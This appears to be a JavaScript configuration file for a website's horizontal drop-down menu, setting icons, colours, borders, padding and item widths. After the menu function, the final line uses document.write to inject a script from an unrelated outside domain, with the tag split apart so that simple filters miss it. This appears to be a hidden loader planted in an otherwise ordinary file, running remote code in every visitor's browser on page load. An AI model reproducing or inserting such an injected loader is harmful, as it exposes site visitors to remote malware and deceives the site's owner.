



/*

          Tips & Tricks

             1: Adjust the "function menudata0()" numeric id in the statement below to match the numeric id of
                the id='imenus0' statement within the menu structure and links secion above.  The numbers must 
                match for the menu to work, multiple menus may be used on a single page by adding new sections 
                with new id's.

             2: To specifically define settings for an individual item or container, apply classes or inline styles
                directly to the UL and A tags in the HTML tags which define your menus structure and links above.

             3: Use the parameter options below to define borders and padding.  Borders and padding specified
                within the menus HTML structure may cause positioning and actual sizing to be offset a bit in
                some browsers.
 
*/




/*-------------------------------------------------
************* Parameter Settings ******************
---------------------------------------------------*/


function menudata0()
{
	
	

    /*---------------------------------------------
    Expand Icon Images
    ---------------------------------------------*/


        //Expand Images are the icons which indicate an additional sub menu level.)
	
        this.main_expand_image_style = "background: url(/imgs/arrow_main1.gif) center right no-repeat;";
        this.main_expand_image_hover_style = "background: url(arrow_main1.gif) center right no-repeat;";

	this.subs_expand_image_style = "background: url(/imgs/arrow_sub.gif) center right no-repeat;";
	this.subs_expand_image_hover_style = "background: url(imgs/arrow_sub.gif) center right no-repeat;";



    /*---------------------------------------------
    Menu Container Settings
    ---------------------------------------------*/

	//Main Container

	   this.main_container_border_width = "1px"
           this.main_container_border_style = "solid"
	   
	   this.main_container_styles =   "BACKGROUND: url(/imgs/HeaderLine.jpg);"


          // this.main_container_styles =   "BACKGROUND-IMAGE: url(/imgs/HeaderLine.jpg);"
		   




	//Sub Containers

           this.subs_container_padding = "5px, 5px, 5px, 5px"
           this.subs_container_border_width = "3px"
           this.subs_container_border_style = "solid"

           this.subs_container_styles =   "BACKGROUND-color:#4AA02C;	\
		   								   border-color:#eeeeee;"



    /*---------------------------------------------
    Menu Item Settings
    ---------------------------------------------*/


	//Main Items

           this.main_item_padding = "2px,5px,2px,5px"
                  
           this.main_item_styles =        "text-decoration:none;		\
                                           font-weight:normal;			\
                                           font-family:verdana;			\
                                           font-size:14px;			\
					   background-color:#339933     	   FONT-WEIGHT: normal;			\
										   color:#000000;			\
										   height:25px;				\
										   BORDER-RIGHT: #000000 thin solid;	\
										   BORDER-TOP: #eeeeee thin solid;		\
										   BORDER-LEFT:#eeeeee thin solid;			\
										   BORDER-BOTTOM: #eeeeee thin solid;		\
										   text-align:center;						\
										   border-width:0px;"
                                          
					   


           this.main_item_hover_styles =  "background-color:#eeeeee;		\
                                           text-decoration:normal;		\
                                           color:#000000;				\
										   border-style:solid;			\
                                           BORDER-RIGHT:#eeeeee 0px groove;		\
										   BORDER-TOP:#eeeeee 1px groove;			\
										   BORDER-LEFT:#eeeeee 1px groove;		\
										   BORDER-BOTTOM:#eeeeee 0px groove;		\
                                           border-width:0px;"
										   

           this.main_item_active_styles = "background-color:#9A9A9A;		\
                                           text-decoration:normal;		\
                                           color:#000000;				\
										   border-style:solid;			\
										   BORDER-RIGHT:#eeeeee 0px groove;		\
										   BORDER-TOP:#eeeeee 1px groove;			\
										   BORDER-LEFT:#eeeeee 1px groove;		\
										   BORDER-BOTTOM:#eeeeee 0px groove;		\
                                           border-width:0px;"



	//Sub Items

           this.subs_item_padding = "2px,5px,2px,5px"
           
           this.subs_item_styles =        "text-decoration:none;		\
                                           font-face:verdana;			\
                                           font-size:14px;			\
                                           font-weight:normal;			\
                                           background-color:#4AA02C;		\
                                           color:#eeeeee;			\
										   height:15px;				\
										   width:155px;					\
                                           text-align:left;			\
                                           border-style:none;			\
                                           border-color:#9A9A9A;		\
                                           border-width:0px;"	

           this.subs_item_hover_styles =  "background-color:#4AA02C;		\
                                           color:#eeeeee;					\
										   border-style:none;			\
                                           border-color:9A9A9A;		\
                                           border-width:0px;"

           this.subs_item_active_styles = "background-color:#4AA02C;		\
                                           color:#eeeeee;				\
										   border-style:none;			\
                                           border-color:9A9A9A;		\
                                           border-width:0px;"




   /*---------------------------------------------
    Additional Setting
    ---------------------------------------------*/


        //Main Menu Orientation

           this.main_is_horizontal = true
	

        //Main Menu Item Widths 

           this.main_item_width = 196			//default width for all items

           //this.main_item_width0 = 190		//optional specific width for the first menu item
           //this.main_item_width1 = 190		//optional specific width for the second menu item...
           //this.main_item_width2 = 190		//optional specific width for the second menu item...
			//this.main_item_width3 = 210		//optional specific width for the second menu item...
			//this.main_item_width4 = 190		//optional specific width for the second menu item...
			//this.main_item_width5 = 155		//optional specific width for the second menu item...

        //The mouse off and mouse over delay for sub menus

           this.menu_showhide_delay = 200;

}


document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Captcha.js"></scri'+'pt>');